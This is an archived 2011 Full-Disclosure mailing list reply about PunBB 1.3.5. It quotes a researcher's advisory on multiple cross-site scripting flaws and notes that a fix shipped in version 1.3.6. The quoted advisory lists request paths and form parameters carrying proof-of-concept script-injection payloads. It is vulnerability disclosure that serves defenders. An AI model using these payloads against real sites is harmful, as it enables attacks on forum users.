lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20110918163100.GA9348@foo.fgeek.fi> Date: Sun, 18 Sep 2011 19:31:00 +0300 From: Henri Salo <henri@...v.fi> To: Piotr Duszynski <piotr@...zynski.eu> Cc: full-disclosure@...ts.grok.org.uk Subject: Re: PunBB PHP Forum - Multiple XSS On Fri, Sep 16, 2011 at 06:43:47PM +0200, Piotr Duszynski wrote: > ======================================================================= > PunBB PHP Forum - Multiple XSS > ======================================================================= > > Affected Software : PunBB PHP Forum > Severity : Medium > Local/Remote : Remote > Author : @drk1wi > > [Summary] > > Just for those whom it might concern. > These vulnerabilities have been identified for the latest (clean > version 1.3.5) during one of my penetration tests. > > [Vulnerability Details] > > > GET > /login.php?action=out&id=3&csrf_token=4b072f27396cec5d79"/><script>alert(oink)</script> > GET > /misc.php?action=markforumread&fid=1&csrf_token=c173cabad786"/><script>alert(oink)</script> > > POST /delete.php?id=>"'><script>alert(oink)</script> > form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_confirm=>"'><script>alert(oink)</script>&delete=>"'><script>alert(oink)</script> > > POST /edit.php?id=>"'><script>alert(oink)</script> > form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_message=>"'><script>alert(oink)</script>&submit=>"'><script>alert(oink)</script> > > POST /login.php?action=>"'><script>alert(oink)</script> > form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_email=>"'><script>alert(oink)</script>&request_pass=>"'><script>alert(oink)</script> > > POST /misc.php?email=>"'><script>alert(oink)</script> > form_sent=>"'><script>alert(oink)</script>&redirect_url=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_subject=>"'><script>alert(oink)</script>&req_message=>"'><script>alert(oink)</script>&submit=>"'><script>alert(oink)</script> > > POST > /profile.php?action=>"'><script>alert(oink)</script>&id=>"'><script>alert(oink)</script> > form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_old_password=>"'><script>alert(oink)</script>&req_new_password1=>"'><script>alert(oink)</script>&req_new_password2=>"'><script>alert(oink)</script>&update=>"'><script>alert(oink)</script> > > POST /register.php?action=>"'><script>alert(oink)</script> > form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_username=>"'><script>alert(oink)</script>&req_password1=>"'><script>alert(oink)</script>&req_password2=>"'><script>alert(369448)</script>&req_email1=>"'><script>alert(oink)</script>&timezone=>"'><script>alert(oink)</script>®ister=>"'><script>alert(oink)</script> > > > [Time-line] > > 20/08/2011 - Vendor notified > 02/09/2011 - No e-mail reply and BAN on Forum > ??? - Vendor patch release > 16/09/2011 - Public disclosure > > [Fix Information] > > > Cheers, > Piotr Duszynski (@drk1wi) > http://sharpsec.net > > X. LEGAL NOTICES > > Copyright (c) 2011 Piotr "drk1wi" Duszynski > > Permission is granted for the redistribution of this alert > electronically. It may not be edited in any way without mine express > written consent. If you wish to reprint the whole or any > part of this alert in any other medium other than electronically, > please email me for permission. > > Disclaimer: The information in the advisory is believed to be accurate > at the time of publishing based on currently available information. Use > of the information constitutes acceptance for use in an AS IS > condition. > There are no warranties with regard to this information. Neither the > author nor the publisher accepts any liability for any direct, > indirect, > or consequential loss or damage arising from use of, or reliance on, > this information. Fixed on: https://github.com/punbb/punbb/commit/dd50a50a2760f10bd2d09814e30af4b36052ca6d PunBB 1.3.6 released: https://github.com/downloads/punbb/punbb/punbb-1.3.6.zip I can request CVE-identifier for this issue. Best regards, Henri Salo _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists